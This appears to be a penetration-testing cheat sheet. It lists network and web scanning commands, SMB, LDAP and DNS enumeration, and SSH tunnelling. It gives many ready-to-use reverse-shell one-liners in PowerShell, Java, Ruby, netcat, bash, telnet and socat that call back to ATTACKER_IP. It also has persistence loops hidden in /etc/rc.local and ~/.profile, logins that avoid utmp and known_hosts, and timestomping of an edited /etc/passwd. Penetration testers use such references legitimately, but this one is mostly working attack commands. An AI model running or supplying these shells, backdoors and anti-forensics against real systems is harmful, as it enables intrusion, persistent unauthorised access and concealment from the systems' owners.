Network Scanning
$ nmap -A 10.10.10.150
Enables OS detection, version detection, script scanning, and traceroute
-sV = enumerate versions
-sC = default script scan
-vv = verbosity
-o = output directory
-T5 = aggresive scan
--script vuln = vulnerable script scan
-p1-65534 = all ports
$ nmap -sV -sT -Pn -sC -O 10.10.10.150 -p-
$ nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.150
$ wfuzz -z -w file,/usr/share/wordlists/seclists/Discovery/Web-Content/common.txt --ss flag 91 http://127.0.0.1/vuln.php?cmd=FUZZ
$ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -z list,php-txt-html-zip-tar-tar.gz-7z --hc 403,404 -t 20 -u http://10.10.10.187/utility-scripts/FUZZ.FUZ2Z
$ gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://10.10.10.150
$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://jeff.thm/backups/ -t 20 -x zip,tar,gzip,php,txt,log
$ nikto -h 10.10.10.150
$ dirb 10.10.10.150
SSH
#Almost invisible SSH
$ ssh -o UserKnownHostsFile=/dev/null -T user@host.org "bash -i"
This will not add your user to the /var/log/utmp file and you won't show up in w or who command of logged in users. It will bypass .profile and .bash_profile as well. On your client side it will stop logging the host name to ~/.ssh/known_hosts.
#SSH tunnel OUT
We use this all the time to circumvent local firewalls and IP filtering:
$ ssh -g -L31337:1.2.3.4:80 user@host.org
You or anyone else can now connect to your computer on port 31337 and get tunneled to 1.2.3.4 port 80 and appear with the source IP of 'host.org'.
We use this to give access to a friend to an internal machine that is not on the public Internet:
$ ssh -o ExitOnForwardFailure=yes -g -R31338:192.168.0.5:80 user@host.org
Anyone connecting to host.org:31338 will get tunneled to 192.168.0.5 on port 80 via your computer.
#SSH socks4/5 OUT
OpenSSH 7.6 adds support for reverse dynamic forwarding. Example: Tunnel all your browser traffic through your server.
$ ssh -D 1080 user@host.org
Now configure your browser to use SOCKS with 127.0.0.1:1080. All your traffic is now tunneled through host.org and will appear with the source IP of host.org.
#SSH socks4/5 IN
This is the reverse of the above example. It give others access to your local network or let others use your computer as a tunnel end-point.
$ ssh -g -R 1080 user@host.org
The others configuring host.org:1080 as their SOCKS4/5 proxy. They can now connect to any computer on any port that your computer has access to. This includes access to computers behind your firewall that are on your local network.
To list all shares
-N is null share
$ smbclient -N -L \\\\127.0.0.1\\
$ smbcacls -N "//127.0.0.1" /Users
smbmap gives really good info about shares
$ smbmap -u username -p pass1234 -d ECORP -H 127.0.0.1
$ smbmap -u invaliduser 127.0.0.1
Read more: https://www.it-vn.com/2020/04/windows-penetration-testing-cheat-sheet.html
LDAP
$ ldapsearch -x -h domain.name -s base namingcontexts
$ ldapsearch -x -h domain.name -s sub -b 'DC=DOMAIN,DC=NAME'
DNS Zone Transfer
$ dig axfr @TheDNSServerYouWanToAsk domain
Spawning TTY Shell
$ script -qc /bin/bash /dev/null # Linux
$ script -q /dev/null /bin/bash # BSD
or
$ python -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/sh")'
ctrl+z background it
$ /bin/bash -i
$ stty raw -echo
$ nc -nvlp 4444
Create host to transfer file:
$ python -m SimpleHTTPServer <port eg:1337>
Download: $ wget <host>:<port>/<file>
Reverse Shells
#powershell
$ powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',ATTACKER_PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
#Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKER_IP/ATTACKER_PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
#Ruby
$ ruby -rsocket -e'f=TCPSocket.open("ATTACKER_IP",ATTACKER_PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
#Netcat
$ nc -e /bin/sh ATTACKER_IP ATTACKER_PORT
#Bash
$ bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1
On the remote system, this command will connect back to your system (IP = ATTACKER_IP, Port ATTACKER_PORT) and give you a shell prompt:
$ setsid bash -i &>/dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1 &
#Reverse shell without Bash
Especially embedded systems do not always have Bash and the /dev/tcp/ trick will not work. There are many other ways (Python, PHP, Perl, ..). Our favorite is to upload netcat and use netcat or telnet:
On the remote system:
$ nc -e /bin/bash -vn ATTACKER_IP ATTACKER_PORT
Variant if '-e' is not supported:
$ mkfifo /tmp/.io
$ sh -i 2>&1 </tmp/.io | nc -vn ATTACKER_IP ATTACKER_PORT >/tmp/.io
Telnet variant:
$ mkfifo /tmp/.io
$ sh -i 2>&1 </tmp/.io | telnet ATTACKER_IP ATTACKER_PORT >/tmp/.io
Telnet variant when mkfifo is not supported (Ulg!):
$ (touch /dev/shm/.fio; sleep 60; rm -f /dev/shm/.fio) &
$ tail -f /dev/shm/.fio | sh -i 2>&1 | telnet ATTACKER_IP ATTACKER_PORT >/dev/shm/.fio
#Socat
on attacker's host (listener)
$ socat file:`tty`,raw,echo=0 tcp-listen:ATTACKER_PORT
on target host (reverse shell)
$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:ATTACKER_PORT
Read more: https://www.it-vn.com/2019/03/create-metasploit-payload-for-beginner.html
A reverse shell that keeps trying to connect back to us every 3600 seconds (indefinitely). Often used until a real backdoor can be deployed and guarantees easy re-entry to a system in case our connection gets disconnected.
$ while :; do setsid bash -i &>/dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1; sleep 3600; done &>/dev/null &
or add to /etc/rc.local:
$ nohup bash -c 'while :; do setsid bash -i &>/dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1; sleep 3600; done' &>/dev/null &
or the user's ~/.profile (also stops multiple instances from being started):
fuser /dev/shm/.busy &>/dev/null
if [ $? -eq 1 ]; then
nohup /bin/bash -c 'while :; do touch /dev/shm/.busy; exec 3</dev/shm/.busy; setsid bash -i &>/dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1 ; sleep 3600; done' &>/dev/null &
fi
How to survive high latency connections
Hacking over long latency links or slow links can be frustrating. Every keystroke is transmitted one by one and any typo becomes so much more frustrating and time consuming to undo. rlwrap comes to the rescue. It buffers all single keystrokes until Enter is hit and then transmits the entire line at once. This makes it so much easier to type at high speed, correct typos, ...
Example for the receiving end of a revese tunnel:
$ rlwrap nc -vnlp ATTACKER_PORT
Example for SSH:
$ rlwrap ssh user@host
File
#Restore the date of a file
Let's say you have modified /etc/passwd but the file date now shows that /etc/passwd has been modifed. Use touch to change the file data to the date of another file (in this example, /etc/shadow)
$ touch -r /etc/shadow /etc/passwd
#Encrypting a file
Encrypt your 0-Days and log files before transfering them - please. (and pick your own password):
Encrypt:
$ openssl enc -aes-256-cbc -pbkdf2 -k gwCMefVOewAJgfsFVa <input.txt >input.txt.enc
Decrypt:
$ openssl enc -d -aes-256-cbc -pbkdf2 -k gwCMefVOewAJgfsFVa <input.txt.enc >input.text
gwCMefVOewAJgfsFVa is example Key
